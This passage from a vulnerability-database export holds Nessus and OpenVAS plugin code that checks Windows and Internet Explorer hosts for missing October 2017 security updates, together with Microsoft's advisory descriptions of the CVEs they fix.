buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4041690/windows-server-2012-update-kb4041690\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e258896f\");\n # https://support.microsoft.com/en-us/help/4041679/windows-server-2012-update-kb4041679\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14f62d6a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4041690 or KB4041679.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041690', '4041679');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041690, 4041679])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:15", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041678\nor cumulative update 4041681. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_4041681.NASL", "href": "https://www.tenable.com/plugins/nessus/103746", "published": "2017-10-10T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103746);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11819\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101147,\n 101149,\n 101161,\n 101162,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041681\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041678\");\n script_xref(name:\"MSFT\", value:\"MS17-4041681\");\n script_xref(name:\"MSFT\", value:\"MS17-4041678\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041678\nor cumulative update 4041681. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4041681/windows-7-update-kb4041681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d1a2595\");\n # https://support.microsoft.com/en-us/help/4041678/windows-7-update-kb4041678\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?501fabf5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4041678 or Cumulative update KB4041681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041681', '4041678');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041681, 4041678])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4040685.", "modified": "2019-05-20T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310811934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811934", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811934\");\n script_version(\"2019-05-20T11:12:48+0000\");\n script_cve_id(\"CVE-2017-11790\", \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11813\",\n \"CVE-2017-11822\");\n script_bugtraq_id(101077, 101141, 101081, 101083, 101122);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-20 11:12:48 +0000 (Mon, 20 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 11:55:08 +0530 (Wed, 11 Oct 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4040685.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Internet Explorer improperly accesses objects in memory.\n\n - The way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - Internet Explorer improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code in the context of the current user, gain access to\n potentially sensitive information, spoof content or serve as a pivot and detect\n specific files on the user's computer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x,\n 10.x and 11.x\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040685\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2, win2012:1, win2012R2:1,\n win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|1[01])\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21061\")){\n Vulnerable_range = \"Less than 9.0.8112.21061\";\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"10.0.9200.22277\")){\n Vulnerable_range = \"Less than 10.0.9200.22277\";\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"11.0.9600.18817\")){\n Vulnerable_range = \"Less than 11.0.9600.18817\";\n }\n}\n\nif(Vulnerable_range)\n{\n report = 'File checked: ' + iePath + \"\\Mshtml.dll\" + '\\n' +\n 'File version: ' + iedllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041690", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310811927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811927", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811927\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-11763\",\n \"CVE-2017-11765\", \"CVE-2017-8718\", \"CVE-2017-8727\", \"CVE-2017-11815\",\n \"CVE-2017-11771\", \"CVE-2017-11772\", \"CVE-2017-11779\", \"CVE-2017-11780\",\n \"CVE-2017-11781\", \"CVE-2017-11784\", \"CVE-2017-11785\", \"CVE-2017-11790\",\n \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11816\", \"CVE-2017-11817\",\n \"CVE-2017-11818\", \"CVE-2017-11824\", \"CVE-2017-11814\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101109, 101111, 101162, 101142, 101114,\n 101116, 101166, 101110, 101140, 101147, 101149, 101077, 101141,\n 101081, 101094, 101095, 101101, 101099, 101093, 101136, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 08:59:57 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Server 2012 